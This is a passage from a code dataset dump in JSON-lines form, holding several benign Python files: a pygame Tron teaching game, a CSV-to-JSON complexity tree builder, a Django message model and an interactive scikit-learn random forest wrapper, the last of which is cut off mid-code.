q)\nplt.xlabel('iteration')\nplt.ylabel('q')\nplt.title('Dual optimisation value versus iteration k')\nplt.show()\n","repo_name":"LinesKing/Introduction-to-Optimisation-ELEN90026_2021_SM1","sub_path":"Notes/Assignment 2/Problem4_4.py","file_name":"Problem4_4.py","file_ext":"py","file_size_in_byte":3445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35444215701","text":"sentence = \"whale hello there. Don't we all love whales? I absolutely love whales! whales are so huge!!!\"\nwhale = 0\nfor x in range(0,len(sentence)):\n a = sentence[x:x+5]\n if a == \"whale\":\n whale = whale+1\nprint(str(whale))\n\nwhale = 0\nwith open('moby.txt') as f:\n for line in f:\n sentence = line.strip()\n for x in range(0,len(sentence)):\n a = sentence[x:x+5]\n if a == \"whale\" or a == \"Whale\" or a == \"WHALE\":\n whale = whale+1\n#or you can just do sentence[x:x+5].lower()\nprint(str(whale))\nf.close()\n\n\n","repo_name":"IsabelleWangg/Comp_Sci_Sem_2","sub_path":"Python/999_Exercises/Moby Dick/baseNEW.1.py","file_name":"baseNEW.1.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74172935148","text":"import pygame\n\npygame.init()\nscreen = pygame.display.set_mode((640, 480))\nclock = pygame.time.Clock()\n\nclass callByRef:\n def __init__(self, **args):\n for (key, value) in args.items():\n setattr(self, key, value)\nvariables = callByRef(\n running = True,\n background_colour = ( 0, 0, 0, 255),\n color_exit = (255, 0, 0, 255), # VER: maze\n level_number = 1, # Ver: maze\n player1_color = (255, 255, 0 ), # Ver: line\n player1_x_pos = None, # Ver: line\n player1_y_pos = None, # Ver: line\n player1_x_move = None, # Ver: line\n player1_y_move = None, # Ver: line\n player2_color = (255, 0, 0 ), # Ver: player2\n player2_x_pos = None, # Ver: player2\n player2_y_pos = None, # Ver: player2\n player2_x_move = None, # Ver: player2\n player2_y_move = None, # Ver: player2\n player1_score = 0, # Ver: score\n player2_score = 0, # Ver: score\n)\n\ndef reset():\n pygame.draw.rect(screen, variables.background_colour, pygame.Rect(0, 0, screen.get_width(), screen.get_height()))\n #level_image = pygame.image.load(\"MazeLevel%d.gif\" % level_number) # VER: maze\n #screen.blit(level_image, level_image.get_rect()) # VER: maze\n variables.player1_x_pos = 50 # Ver: line\n variables.player1_y_pos = 50 # Ver: line\n variables.player1_x_move = 1 # Ver: line\n variables.player1_y_move = 0 # Ver: line\n variables.player2_x_pos = screen.get_width() - 50 # Ver: player2\n variables.player2_y_pos = screen.get_height() - 50 # Ver: player2\n variables.player2_x_move = -1 # Ver: player2\n variables.player2_y_move = 0 # Ver: player2\n\nreset()\nwhile variables.running:\n clock.tick(60)\n \n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n variables.running = False\n \n keys = pygame.key.get_pressed() # Ver: input\n if keys[pygame.K_ESCAPE]: # Ver: input\n variables.running = False # Ver: input\n # Ver: input\n if keys[pygame.K_UP ]: # Ver: input\n variables.player1_x_move = 0 # Ver: input\n variables.player1_y_move = -1 # Ver: input\n if keys[pygame.K_RIGHT ]: # Ver: input\n variables.player1_x_move = 1 # Ver: input HIDE\n variables.player1_y_move = 0 # Ver: input HIDE\n if keys[pygame.K_LEFT ]: # Ver: input HIDE\n variables.player1_x_move = -1 # Ver: input HIDE\n variables.player1_y_move = 0 # Ver: input HIDE\n if keys[pygame.K_DOWN ]: # Ver: input HIDE\n 
variables.player1_x_move = 0 # Ver: input HIDE\n variables.player1_y_move = 1 # Ver: input HIDE\n # Ver: player2\n if keys[pygame.K_w ]: # Ver: player2\n variables.player2_x_move = 0 # Ver: player2\n variables.player2_y_move = -1 # Ver: player2\n if keys[pygame.K_d ]: # Ver: player2\n variables.player2_x_move = 1 # Ver: player2 HIDE\n variables.player2_y_move = 0 # Ver: player2 HIDE\n if keys[pygame.K_a ]: # Ver: player2 HIDE\n variables.player2_x_move = -1 # Ver: player2 HIDE\n variables.player2_y_move = 0 # Ver: player2 HIDE\n if keys[pygame.K_s ]: # Ver: player2 HIDE\n variables.player2_x_move = 0 # Ver: player2 HIDE\n variables.player2_y_move = 1 # Ver: player2 HIDE\n # Ver: player2\n variables.player1_x_pos = variables.player1_x_pos + variables.player1_x_move # Ver: line\n variables.player1_y_pos = variables.player1_y_pos + variables.player1_y_move # Ver: line\n # Ver: line\n variables.player2_x_pos = variables.player2_x_pos + variables.player2_x_move # Ver: player2\n variables.player2_y_pos = variables.player2_y_pos + variables.player2_y_move # Ver: player2 HIDE\n # Ver: player2\n if variables.player1_x_pos<=0 : variables.player1_x_pos = screen.get_width() -1 # VER: wrap\n if variables.player1_x_pos>=screen.get_width() : variables.player1_x_pos = 1 # VER: wrap\n if variables.player1_y_pos<=0 : variables.player1_y_pos = screen.get_height()-1 # VER: wrap HIDE\n if variables.player1_y_pos>=screen.get_height(): variables.player1_y_pos = 1 # VER: wrap HIDE\n if variables.player2_x_pos<=0 : variables.player2_x_pos = screen.get_width() -1 # VER: player2,wrap\n if variables.player2_x_pos>=screen.get_width() : variables.player2_x_pos = 1 # VER: player2,wrap\n if variables.player2_y_pos<=0 : variables.player2_y_pos = screen.get_height()-1 # VER: player2,wrap HIDE\n if variables.player2_y_pos>=screen.get_height(): variables.player2_y_pos = 1 # VER: player2,wrap HIDE\n # VER: wrap\n try : player1_at_pixel = screen.get_at((variables.player1_x_pos, variables.player1_y_pos)) # Ver: colide\n except: player1_at_pixel = None # Ver: colide\n if player1_at_pixel == variables.color_exit: # VER: maze\n variables.level_number += 1 # VER: maze\n if player1_at_pixel != variables.background_colour: # Ver: colide\n variables.player2_score = variables.player2_score + 1 # Ver: score\n reset() # Ver: colide\n # Ver: colide\n try : player2_at_pixel = screen.get_at((variables.player2_x_pos, variables.player2_y_pos)) # Ver: player2\n except: player2_at_pixel = None # Ver: player2 HIDE\n if player2_at_pixel != variables.background_colour: # Ver: player2\n variables.player1_score = variables.player1_score + 1 # Ver: score HIDE\n reset() # Ver: player2 HIDE\n # Ver: player2\n screen.set_at((variables.player1_x_pos, variables.player1_y_pos), variables.player1_color) # Ver: line\n screen.set_at((variables.player2_x_pos, variables.player2_y_pos), variables.player2_color) # Ver: player2 HIDE\n # Ver: line\n if variables.player1_score == 5 or variables.player2_score == 5: # Ver: score\n variables.running = False # Ver: score\n # Ver: score\n pygame.display.flip()\n\npygame.quit()\n # Ver: score\nprint(\"Player 1 Score\") # Ver: score\nprint(variables.player1_score) # Ver: score\nprint(\"Player 2 Score\") # Ver: score\nprint(variables.player2_score) # Ver: score","repo_name":"calaldees/TeachProgramming","sub_path":"teachprogramming/static/projects/game/tron.py","file_name":"tron.py","file_ext":"py","file_size_in_byte":7807,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} 
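The tron.py record above implements screen wrap-around by teleporting a player that crosses an edge to one pixel inside the opposite edge. A standalone sketch of that rule, with a hypothetical helper name and assert-based checks that are not in the record:

def wrap(pos, size):
    # Crossing the low edge re-enters just inside the high edge,
    # and vice versa; interior positions pass through unchanged.
    if pos <= 0:
        return size - 1
    if pos >= size:
        return 1
    return pos

assert wrap(0, 640) == 639     # off the left edge -> right side
assert wrap(640, 640) == 1     # off the right edge -> left side
assert wrap(320, 640) == 320   # interior position unchanged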
+{"seq_id":"24949032585","text":"import json\nimport pathlib\nimport pandas as pd\nimport find_prefix\n\nclass test_json:\n def toJSON(self):\n return json.dumps(self, default=lambda o: o.__dict__, \n sort_keys=True, indent=4)\n\ndef add_path_to_json(path, filename):\n aux = test_json()\n aux.name = filename\n aux.children = []\n\n path.children.append(aux)\n return aux\n\n\ndef add_method_to_json(path, method, complexity, filename, start_line, org, project):\n aux = test_json()\n aux.children = []\n\n aux.name = method.split(\"::\")[-1]\n\n if(len(aux.name) >=18):\n aux.name = aux.name[0:18] + \"...\"\n\n aux.name += \"()\"\n data = test_json()\n data.name = method+\"()\"\n data.size = complexity\n data.url = \"https://github.com/\" + org + \"/\" + project + \"/blob/master/\" + filename + \"#L\" + str(start_line)\n data.color = find_prefix.get_color(data.name)\n data.category = find_prefix.find_prefix(data.name)\n\n aux.color = data.color\n aux.children.append(data)\n path.children.append(aux)\n\n\ndef find_path(paths, name):\n for path in paths:\n if(path.name == name):\n return path\n return False\n\ndef csv_to_json(org, project):\n path_system = pathlib.Path(__file__).parents[1]\n df = pd.read_csv(str(path_system) + '/datasets/' + project + '.csv')\n df = df[df.cyclomatic_complexity >= 10]\n print(len(df))\n tree = test_json()\n tree.name = \"PROJECT - \" + project\n tree.children = []\n \n for index, row in df.iterrows():\n filename = row['filename']\n list_filename = filename.split('/')\n \n current = tree\n for path in list_filename:\n path_exist = find_path(current.children, path)\n\n if(path_exist == False):\n novo_path = add_path_to_json(current, path)\n current = novo_path\n else:\n current = path_exist\n\n add_method_to_json(current, row['name'], row['cyclomatic_complexity'], row['filename'], row['start_line'], org, project)\n\n #if(aux == 10):\n # break\n #aux+=1\n\n with open(str(path_system) + '/dist/' + project + '.json', 'w') as f:\n f.write(tree.toJSON())\n\n\ncsv_to_json('ytdl-org', 'youtube-dl')\ncsv_to_json('apple','swift')\ncsv_to_json('facebook','react')","repo_name":"MatLopes23/Complex-Circles","sub_path":"utils/csv_to_json.py","file_name":"csv_to_json.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74085704107","text":"import random\nfrom django.db import models\nfrom django_extensions.db.fields.json import JSONField\n\nclass Message(models.Model):\n key = models.CharField(max_length=40, primary_key=True)\n data = JSONField()\n\n @models.permalink\n def get_absolute_url(self):\n return ('view_message_online', (), {\n 'key': self.key,\n })\n\n def save(self, *args, **kwargs):\n if not self.key:\n while True:\n try:\n self.key = '%04x' % random.getrandbits(40 * 4)\n super(Message, self).save(*args, **kwargs)\n except:\n continue\n else:\n return\n\n super(Message, self).save(*args, **kwargs)\n\n def __unicode__(self):\n return u\"%s to %s\" % (self.data['subject'], ', '.join(self.data['to']))\n","repo_name":"amccloud/django-firstclass","sub_path":"firstclass/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"37"} +{"seq_id":"1385676468","text":"\"\"\"RandomForest trains a random forest model implemented by\nScikit-Learn on the given dataset. Before training, the user is\nprompted for parameter input. 
After training, model metrics are\ndisplayed, and the user can make new predictions. Classification and\nregression are both supported.\n\nView the documentation at https://manufacturingnet.readthedocs.io/.\n\"\"\"\n\nfrom math import sqrt\n\nimport matplotlib.pyplot as plt\nfrom sklearn.ensemble import RandomForestClassifier, RandomForestRegressor\nfrom sklearn.metrics import (accuracy_score, confusion_matrix, make_scorer,\n mean_squared_error, roc_auc_score, roc_curve)\nfrom sklearn.model_selection import (GridSearchCV, cross_val_score,\n train_test_split)\n\n\nclass RandomForest:\n \"\"\"Class framework for random forest classification and regression\n models.\n \"\"\"\n\n def __init__(self, attributes=None, labels=None):\n \"\"\"Initializes a RandomForest object.\"\"\"\n self.attributes = attributes\n self.labels = labels\n\n self.test_size = None\n self.cv = None\n self.graph_results = None\n self.fpr = None\n self.tpr = None\n self.bin = None\n self.gridsearch = False\n self.gs_params = None\n self.gs_result = None\n\n self.classifier = None\n self.accuracy = None\n self.roc_auc = None\n self.confusion_matrix = None\n self.cross_val_scores_classifier = None\n self.feature_importances_classifier = None\n\n self.regressor = None\n self.r2_score = None\n self.r_score = None\n self.mean_squared_error = None\n self.cross_val_scores_regressor = None\n self.feature_importances_regressor = None\n\n # Accessor methods\n\n def get_attributes(self):\n \"\"\"Accessor method for attributes.\"\"\"\n return self.attributes\n\n def get_labels(self):\n \"\"\"Accessor method for labels.\"\"\"\n return self.labels\n\n def get_classifier(self):\n \"\"\"Accessor method for classifier.\"\"\"\n return self.classifier\n\n def get_accuracy(self):\n \"\"\"Accessor method for accuracy.\"\"\"\n return self.accuracy\n\n def get_roc_auc(self):\n \"\"\"Accessor method for roc_auc.\"\"\"\n return self.roc_auc\n\n def get_confusion_matrix(self):\n \"\"\"Accessor method for confusion_matrix.\"\"\"\n return self.confusion_matrix\n\n def get_cross_val_scores_classifier(self):\n \"\"\"Accessor method for cross_val_scores_classifier.\"\"\"\n return self.cross_val_scores_classifier\n\n def get_feature_importances_classifier(self):\n \"\"\"Accessor method for feature_importances_classifier.\"\"\"\n return self.feature_importances_classifier\n\n def get_regressor(self):\n \"\"\"Accessor method for regressor.\"\"\"\n return self.regressor\n\n def get_r2_score(self):\n \"\"\"Accessor method for r2_score.\"\"\"\n return self.r2_score\n\n def get_r_score(self):\n \"\"\"Accessor method for r_score.\"\"\"\n return self.r_score\n\n def get_mean_squared_error(self):\n \"\"\"Accessor method for mean_squared_error.\"\"\"\n return self.mean_squared_error\n\n def get_cross_val_scores_regressor(self):\n \"\"\"Accessor method for cross_val_scores_regressor.\"\"\"\n return self.cross_val_scores_regressor\n\n def get_feature_importances_regressor(self):\n \"\"\"Accessor method for feature_importances_regressor.\"\"\"\n return self.feature_importances_regressor\n\n # Modifier methods\n\n def set_attributes(self, new_attributes=None):\n \"\"\"Modifier method for attributes.\"\"\"\n self.attributes = new_attributes\n\n def set_labels(self, new_labels=None):\n \"\"\"Modifier method for labels.\"\"\"\n self.labels = new_labels\n\n # Wrappers for RandomForest classes\n\n def run_classifier(self):\n \"\"\"Provides random forest's classifier functionality.\"\"\"\n if self._check_inputs():\n # Initialize classifier\n self.classifier = 
self._create_model(classifier=True)\n\n # Split attributes and labels into training/testing data\n dataset_X_train, dataset_X_test, dataset_y_train, dataset_y_test = \\\n train_test_split(self.attributes, self.labels,\n test_size=self.test_size)\n\n # Train classifier\n # Handle exception if arguments are incorrect\n try:\n self.classifier.fit(dataset_X_train, dataset_y_train)\n except Exception as e:\n print(\"An exception occurred while training the\",\n \"classification model. Check your arguments and try\",\n \"again.\")\n print(\"Here is the exception message:\")\n print(e)\n self.classifier = None\n return\n\n # Metrics\n self.accuracy = self.classifier.score(dataset_X_test,\n dataset_y_test)\n\n y_prediction = self.classifier.predict(dataset_X_test)\n\n probas = self.classifier.predict_proba(dataset_X_test)\n\n # If classification is binary, calculate roc_auc\n if probas.shape[1] == 2:\n self.bin = True\n self.roc_auc = roc_auc_score(y_prediction, probas[::, 1])\n self.fpr, self.tpr, _ = roc_curve(\n dataset_y_test, probas[::, 1])\n # Else, calculate confusion matrix\n else:\n self.confusion_matrix = confusion_matrix(dataset_y_test,\n y_prediction)\n\n self.cross_val_scores_classifier = \\\n cross_val_score(self.classifier, self.attributes, self.labels,\n cv=self.cv)\n self.feature_importances_classifier = \\\n self.classifier.feature_importances_\n\n # Output results\n self._output_classifier_results()\n\n def run_regressor(self):\n \"\"\"Provides random forest's regressor functionality.\"\"\"\n if self._check_inputs():\n # Initialize regressor\n self.regressor = self._create_model(classifier=False)\n\n # Split attributes and labels into training/testing data\n dataset_X_train, dataset_X_test, dataset_y_train, dataset_y_test =\\\n train_test_split(self.attributes, self.labels,\n test_size=self.test_size)\n\n # Train regressor\n # Handle exception if arguments are incorrect and/or labels\n # isn't quantitative\n try:\n self.regressor.fit(dataset_X_train, dataset_y_train)\n except Exception as e:\n print(\"An exception occurred while training the regressor\",\n \"model. Check your arguments and try again.\")\n print(\"Does labels contain only quantitative data?\")\n print(\"Here is the exception message:\")\n print(e)\n self.regressor = None\n return\n\n # Metrics\n self.r2_score = self.regressor.score(\n dataset_X_test, dataset_y_test)\n if self.r2_score >= 0:\n self.r_score = sqrt(self.r2_score)\n\n self.mean_squared_error = \\\n mean_squared_error(dataset_y_test,\n self.regressor.predict(dataset_X_test))\n self.cross_val_scores_regressor = \\\n cross_val_score(self.regressor, self.attributes, self.labels,\n cv=self.cv)\n self.feature_importances_regressor = \\\n self.regressor.feature_importances_\n\n # Output results\n self._output_regressor_results()\n\n def predict_classifier(self, dataset_X=None):\n \"\"\"Classifies each datapoint in dataset_X using the classifier\n model. Returns the predicted classifications.\n \"\"\"\n # Check that run_classifier() has already been called\n if self.classifier is None:\n print(\"The classifier model seems to be missing. Have you called\",\n \"run_classifier() yet?\")\n return None\n\n # Try to make the prediction\n # Handle exception if dataset_X isn't a valid input\n try:\n y_prediction = self.classifier.predict(dataset_X)\n except Exception as e:\n print(\"The model failed to run. 
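For reference, a minimal self-contained sketch of the split/fit/score flow that run_classifier() wraps. The toy arrays X and y are illustrative only, not part of the record:

import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split

X = np.random.rand(60, 4)          # 60 samples, 4 features
y = np.random.randint(0, 2, 60)    # binary labels
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25)
clf = RandomForestClassifier().fit(X_train, y_train)
print(clf.score(X_test, y_test))   # the accuracy run_classifier() stores as self.accuracy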
Check your inputs and try again.\")\n print(\"Here is the exception message:\")\n print(e)\n return None\n\n print(\"\\nRandomForestClassifier Predictions:\\n\", y_prediction, \"\\n\")\n return y_prediction\n\n def predict_regressor(self, dataset_X=None):\n \"\"\"Predicts the output of each datapoint in dataset_X using the\n regressor model. Returns the predictions.\n \"\"\"\n # Check that run_regressor() has already been called\n if self.regressor is None:\n print(\"The regressor model seems to be missing. Have you called\",\n \"run_regressor() yet?\")\n return None\n\n # Try to make the prediction\n # Handle exception if dataset_X isn't a valid input\n try:\n y_prediction = self.regressor.predict(dataset_X)\n except Exception as e:\n print(\"The model failed to run. Check your inputs and try again.\")\n print(\"Here is the exception message:\")\n print(e)\n return None\n\n print(\"\\nRandomForestRegressor Predictions:\\n\", y_prediction, \"\\n\")\n return y_prediction\n\n # Helper methods\n\n def _create_model(self, classifier):\n \"\"\"Runs UI for getting parameters and creating classifier or\n regression model.\n \"\"\"\n if classifier:\n print(\"\\n===========================================\")\n print(\"= RandomForestClassifier Parameter Inputs =\")\n print(\"===========================================\\n\")\n else:\n print(\"\\n==========================================\")\n print(\"= RandomForestRegressor Parameter Inputs =\")\n print(\"==========================================\\n\")\n\n print(\"Default values:\", \"test_size = 0.25\", \"cv = 5\", sep=\"\\n\")\n if classifier:\n print(\"graph_results = False\", \"criterion = 'gini'\",\n \"class_weight = None\", sep=\"\\n\")\n else:\n print(\"criterion = 'mse'\")\n\n print(\"n_estimators = 100\",\n \"max_depth = None\",\n \"min_samples_split = 2\",\n \"min_samples_leaf = 1\",\n \"min_weight_fraction_leaf = 0.0\",\n \"max_features = 'auto'\",\n \"max_leaf_nodes = None\",\n \"min_impurity_decrease = 0.0\",\n \"bootstrap = True\",\n \"oob_score = False\",\n \"n_jobs = None\",\n \"random_state = None\",\n \"verbose = 0\",\n \"warm_start = False\",\n \"ccp_alpha = 0.0\",\n \"max_samples = None\", sep=\"\\n\")\n\n # Set defaults\n self.test_size = 0.25\n self.cv = None\n self.graph_results = False\n\n while True:\n user_input = input(\"\\nUse default parameters (Y/n)? \").lower()\n if user_input in {\"y\", \"\"}:\n print(\"\\n===========================================\")\n print(\"= End of inputs; press enter to continue. 
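The parameter UI that follows repeats one prompt/validate/fall-back-to-default loop per parameter. A hedged refactoring sketch (prompt_number is a hypothetical helper, not present in the record):

def prompt_number(msg, default, cast=float, ok=lambda v: True):
    # Return the default on empty input; otherwise cast and validate, retrying on bad input.
    while True:
        raw = input(msg).strip()
        if raw == "":
            return default
        try:
            val = cast(raw)
            if not ok(val):
                raise ValueError
            return val
        except ValueError:
            print("Invalid input.")

# e.g. test_size = prompt_number("Test fraction (0,1)? ", 0.25, ok=lambda v: 0 < v < 1)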
=\")\n input(\"===========================================\\n\")\n if classifier:\n return RandomForestClassifier()\n return RandomForestRegressor()\n elif user_input == \"n\":\n break\n else:\n print(\"Invalid input.\")\n\n print(\"\\nIf you are unsure about a parameter, press enter to use its\",\n \"default value.\")\n print(\"If you finish entering parameters early, enter 'q' to skip\",\n \"ahead.\\n\")\n\n # Set more defaults\n if classifier:\n criterion = \"gini\"\n class_weight = None\n else:\n criterion = \"mse\"\n\n n_estimators = 100\n max_depth = None\n min_samples_split = 2\n min_samples_leaf = 1\n min_weight_fraction_leaf = 0.0\n max_features = \"auto\"\n max_leaf_nodes = None\n min_impurity_decrease = 0.0\n bootstrap = True\n oob_score = False\n n_jobs = None\n random_state = None\n verbose = 0\n warm_start = False\n ccp_alpha = 0.0\n max_samples = None\n\n # Get user parameter input\n while True:\n break_early = False\n while True:\n user_input = input(\"\\nWhat fraction of the dataset should be the \"\n + \"testing set (0,1)? \")\n try:\n if user_input == \"\":\n break\n elif user_input.lower() == \"q\":\n break_early = True\n break\n\n user_input = float(user_input)\n if user_input <= 0 or user_input >= 1:\n raise Exception\n\n self.test_size = user_input\n break\n except Exception:\n print(\"Invalid input.\")\n\n print(\"test_size =\", self.test_size)\n\n if break_early:\n break\n\n while True:\n user_input = input(\"\\nUse GridSearch to find the best \"\n + \"hyperparameters (y/N)? \").lower()\n if user_input == \"q\":\n break_early = True\n break\n elif user_input in {\"n\", \"y\", \"\"}:\n break\n else:\n print(\"Invalid input.\")\n\n if break_early:\n break\n\n while user_input == \"y\":\n print(\"\\n= GridSearch Parameter Inputs =\\n\")\n print(\"Enter 'q' to skip GridSearch.\")\n self.gridsearch = True\n params = {}\n\n while True:\n print(\"\\nEnter the max_features for the best split.\")\n print(\"Options: 1-auto, 2-sqrt, 3-log2. Enter 'all' for all\",\n \"options.\")\n print(\"Example input: 1,2,3\")\n user_input = input().lower()\n\n if user_input == \"q\":\n self.gridsearch = False\n break_early = True\n break\n elif user_input == \"all\":\n feat_params = [\"auto\", \"sqrt\", \"log2\"]\n break\n else:\n feat_dict = {1: \"auto\", 2: \"sqrt\", 3: \"log2\"}\n try:\n feat_params_int = \\\n list(map(int, list(user_input.split(\",\"))))\n if len(feat_params_int) > len(feat_dict):\n raise Exception\n\n feat_params = []\n for each in feat_params_int:\n if not feat_dict.get(each):\n raise Exception\n\n feat_params.append(feat_dict.get(each))\n break\n except Exception:\n print(\"Invalid input.\")\n\n if break_early:\n break\n\n params[\"max_features\"] = feat_params\n print(\"max_features:\", feat_params)\n\n while True:\n print(\"\\nEnter the list of num_estimators to try out.\")\n print(\"Example input: 1,2,3\")\n user_input = input().lower()\n\n if user_input == \"q\":\n self.gridsearch = False\n break_early = True\n break\n\n try:\n n_est_params = \\\n list(map(int, list(user_input.split(\",\"))))\n if len(n_est_params) == 0:\n raise Exception\n\n for num in n_est_params:\n if num <= 0:\n raise Exception\n break\n except Exception:\n print(\"Invalid input.\")\n\n if break_early:\n break\n\n params[\"n_estimators\"] = n_est_params\n print(\"n_estimators:\", n_est_params)\n\n while True:\n print(\"\\nEnter the criterion to be tried for.\")\n\n if classifier:\n print(\"Options: 1-'gini', 2-'entropy'. 
Enter 'all' for\",\n \"all options.\")\n user_input = input().lower()\n\n if user_input == \"q\":\n self.gridsearch = False\n break_early = True\n break\n elif user_input == \"all\":\n crit_params = [\"gini\", \"entropy\"]\n break\n else:\n crit_dict = {1: \"gini\", 2: \"entropy\"}\n try:\n crit_params_int = \\\n list(map(int, list(user_input.split(\",\"))))\n if len(crit_params_int) > len(crit_dict):\n raise Exception\n\n crit_params = []\n for each in crit_params_int:\n if not crit_dict.get(each):\n raise Exception\n\n crit_params.append(crit_dict.get(each))\n break\n except Exception:\n print(\"Invalid input.\")\n else:\n print(\"Options: 1-'mse', 2-'mae'. Enter 'all' for all\",\n \"options.\")\n user_input = input().lower()\n\n if user_input == \"q\":\n self.gridsearch = False\n break_early = True\n break\n elif user_input == \"all\":\n crit_params = [\"mse\", \"mae\"]\n break\n else:\n crit_dict = {1: \"mse\", 2: \"mae\"}\n try:\n crit_params_int = \\\n list(map(int, list(user_input.split(\",\"))))\n if len(crit_params_int) > len(crit_dict):\n raise Exception\n\n crit_params = []\n for each in crit_params_int:\n if not crit_dict.get(each):\n raise Exception\n\n crit_params.append(crit_dict.get(each))\n break\n except Exception:\n print(\"Invalid input.\")\n\n if break_early:\n break\n\n params[\"criterion\"] = crit_params\n print(\"criterion:\", crit_params)\n\n while True:\n print(\"\\nEnter the maximum depth of trees to try for.\")\n print(\"Example input: 1,2,3\")\n user_input = input().lower()\n\n if user_input == \"q\":\n self.gridsearch = False\n break_early = True\n break\n\n try:\n max_dep_params = \\\n list(map(int, list(user_input.split(\",\"))))\n if len(max_dep_params) == 0:\n raise Exception\n\n for num in max_dep_params:\n if num <= 0:\n raise Exception\n break\n except Exception:\n print(\"Invalid input.\")\n\n if break_early:\n break\n\n params[\"max_depth\"] = max_dep_params\n print(\"max_depths:\", max_dep_params)\n\n print(\"\\n= End of GridSearch inputs. =\\n\")\n self.gs_params = params\n best_params = self._run_gridsearch(classifier)\n criterion = best_params[\"criterion\"]\n max_depth = best_params[\"max_depth\"]\n max_features = best_params[\"max_features\"]\n n_estimators = best_params[\"n_estimators\"]\n break\n\n break_early = False\n\n while True:\n user_input = input(\"\\nEnter the number of folds for cross \"\n + \"validation [2,): \")\n try:\n if user_input == \"\":\n break\n elif user_input.lower() == \"q\":\n break_early = True\n break\n\n user_input = int(user_input)\n if user_input < 2:\n raise Exception\n\n self.cv = user_input\n break\n except Exception:\n print(\"Invalid input.\")\n\n print(\"cv =\", self.cv)\n\n if break_early:\n break\n\n while classifier:\n user_input = \\\n input(\"\\nGraph the ROC curve? 
Only binary classification \"\n + \"is supported (y/N): \").lower()\n if user_input == \"y\":\n self.graph_results = True\n break\n elif user_input in {\"n\", \"\"}:\n break\n elif user_input == \"q\":\n break_early = True\n break\n else:\n print(\"Invalid input.\")\n\n if classifier:\n print(\"graph_results =\", self.graph_results)\n\n if break_early:\n break\n\n while not self.gridsearch:\n user_input = \\\n input(\"\\nEnter a positive number of trees for the forest: \")\n try:\n if user_input == \"\":\n break\n elif user_input.lower() == \"q\":\n break_early = True\n break\n\n user_input = int(user_input)\n if user_input <= 0:\n raise Exception\n\n n_estimators = user_input\n break\n except Exception:\n print(\"Invalid input.\")\n\n if not self.gridsearch:\n print(\"n_estimators =\", n_estimators)\n\n if break_early:\n break\n\n while not self.gridsearch:\n print(\"\\nWhich criteria should be used for measuring split\",\n \"quality?\")\n if classifier:\n user_input = input(\n \"Enter 1 for 'gini' or 2 for 'entropy': \")\n if user_input == \"2\":\n criterion = \"entropy\"\n break\n elif user_input in {\"1\", \"\"}:\n break\n elif user_input.lower() == \"q\":\n break_early = True\n break\n else:\n print(\"Invalid input.\")\n else:\n user_input = input(\"Enter 1 for 'mse' or 2 for 'mae': \")\n if user_input == \"2\":\n criterion = \"mae\"\n break\n elif user_input in {\"1\", \"\"}:\n break\n elif user_input.lower() == \"q\":\n break_early = True\n break\n else:\n print(\"Invalid input.\")\n\n if not self.gridsearch:\n print(\"criterion =\", criterion)\n\n if break_early:\n break\n\n while classifier:\n user_input = input(\"\\nAutomatically balance the class weights \"\n + \"(y/N)? \").lower()\n if user_input == \"y\":\n class_weight = \"balanced\"\n break\n elif user_input in {\"n\", \"\"}:\n break\n elif user_input == \"q\":\n break_early = True\n break\n else:\n print(\"Invalid input.\")\n\n if classifier:\n print(\"class_weight =\", class_weight)\n\n if break_early:\n break\n\n while not self.gridsearch:\n print(\"\\nEnter a positive maximum tree depth.\")\n user_input = input(\"Press enter for no maximum depth: \")\n try:\n if user_input == \"\":\n break\n elif user_input.lower() == \"q\":\n break_early = True\n break\n\n user_input = int(user_input)\n if user_input <= 0:\n raise Exception\n\n max_depth = user_input\n break\n except Exception:\n print(\"Invalid input.\")\n\n if not self.gridsearch:\n print(\"max_depth =\", max_depth)\n\n if break_early:\n break\n\n while True:\n user_input = \\\n input(\"\\nEnter min_samples_split, a positive minimum number \"\n + \"of samples required to split an internal node: \")\n try:\n if user_input == \"\":\n break\n elif user_input.lower() == \"q\":\n break_early = True\n break\n\n if int(user_input) < 1:\n if float(user_input) <= 0:\n raise Exception\n\n min_samples_split = float(user_input)\n else:\n if int(user_input) <= 0:\n raise Exception\n\n min_samples_split = int(user_input)\n break\n except Exception:\n print(\"Invalid input.\")\n\n print(\"min_samples_split =\", min_samples_split)\n\n if break_early:\n break\n\n while True:\n user_input = \\\n input(\"\\nEnter min_samples_leaf, a positive minimum number \"\n + \"of samples required to be at a leaf node: \")\n try:\n if user_input == \"\":\n break\n elif user_input.lower() == \"q\":\n break_early = True\n break\n\n if int(user_input) < 1:\n if float(user_input) <= 0:\n raise Exception\n\n min_samples_leaf = float(user_input)\n else:\n if int(user_input) <= 0:\n raise Exception\n\n 
min_samples_leaf = int(user_input)\n break\n except Exception:\n print(\"Invalid input.\")\n\n print(\"min_samples_leaf =\", min_samples_leaf)\n\n if break_early:\n break\n\n while True:\n user_input = \\\n input(\"\\nEnter min_weight_fraction_leaf, the minimum \"\n + \"weighted fraction of the weight total required to \"\n + \"be at a leaf node [0,0.5]: \")\n try:\n if user_input == \"\":\n break\n elif user_input.lower() == \"q\":\n break_early = True\n break\n\n user_input = float(user_input)\n if user_input < 0 or user_input > 0.5:\n raise Exception\n\n min_weight_fraction_leaf = user_input\n break\n except Exception:\n print(\"Invalid input.\")\n\n print(\"min_weight_fraction_leaf =\", min_weight_fraction_leaf)\n\n if break_early:\n break\n\n while not self.gridsearch:\n print(\"\\nHow many features should be considered when looking\",\n \"for the best split?\")\n print(\"Enter 'auto' to use n_features, 'sqrt' to use\",\n \"sqrt(n_features), 'log2' to use log2(n_features) or a\",\n \"positive number/fraction: \")\n user_input = input().lower()\n\n try:\n if user_input in {\"sqrt\", \"log2\", \"auto\"}:\n max_features = user_input\n break\n elif user_input == \"\":\n break\n elif user_input.lower() == \"q\":\n break_early = True\n break\n\n if int(user_input) == 0:\n user_input = float(user_input)\n else:\n user_input = int(user_input)\n\n if user_input <= 0:\n raise 